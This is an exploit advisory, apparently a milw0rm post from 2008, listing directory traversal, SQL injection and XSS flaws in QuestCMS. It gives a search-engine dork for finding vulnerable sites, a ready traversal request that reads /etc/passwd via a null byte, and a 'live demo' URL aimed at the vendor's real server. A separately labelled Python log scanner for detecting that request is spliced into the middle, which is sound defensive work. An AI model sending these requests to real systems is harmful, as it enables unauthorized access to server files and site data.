--------------------------------------------------------------------------------
Title : QuestCMS Multiple Remote Vulnerabilities [XSS/Directory Traversal/SQL]
--------------------------------------------------------------------------------
#Author: d3b4g
#contact: bl4ckend[at]gmail[dot]com
--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com
--------------------------------------------------------------------------------
dork : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnerability
=============================
Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
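
A defender-side check for the traversal request shown above, as an added example that is not part of the original advisory: it scans web access logs for requests to main.php whose theme parameter carries a ".." path segment or a null byte. The common-log-format sample lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encodings are normalised."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def theme_findings(target):
    """Return reasons the `theme` parameter of main.php looks like a file path."""
    parts = urlsplit(target)
    if not parts.path.endswith("/main/main.php"):
        return []
    reasons = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != "theme":
            continue
        value = fully_decode(value)  # parse_qsl has already decoded once
        if "\x00" in value:
            reasons.add("null-byte")
        if ".." in re.split(r"[\\/]", value):
            reasons.add("dot-dot-segment")
    return sorted(reasons)

def scan(lines):
    """Return (line_number, reasons) for each log line with a suspicious theme."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reasons = theme_findings(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample lines in common log format (not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Oct/2008:10:00:01 +0000] "GET /questcms/main/main.php?lang=tc&page=1&theme=default HTTP/1.1" 200 5120',
    '198.51.100.9 - - [27/Oct/2008:10:00:05 +0000] "GET /questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html HTTP/1.1" 200 1830',
    '198.51.100.9 - - [27/Oct/2008:10:00:09 +0000] "GET /questcms/main/main.php?theme=%2e%2e%2fconfig HTTP/1.1" 200 412',
    '198.51.100.7 - - [27/Oct/2008:10:00:12 +0000] "GET /blog/index.php?theme=../x HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, ", ".join(reasons))
```

A hit with a 200 status and a response size that differs from normal theme loads is worth triaging first, since it suggests the file was actually read.
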
---------------------------------------------------------------------------------
SQL injection:
==============
Vuln file : questcms/main/main.php?obj=[sql]
XSS:
====
Exploit : /main/main.php?cx=[Xss]
--------------------------------------------------------------------------------
greetz:
All my friends, milw0rm...
--------------------------------------------------------------------------------
--------------------------------- [ www.hotlism.org ] --------------------------------------
# milw0rm.com [2008-10-27]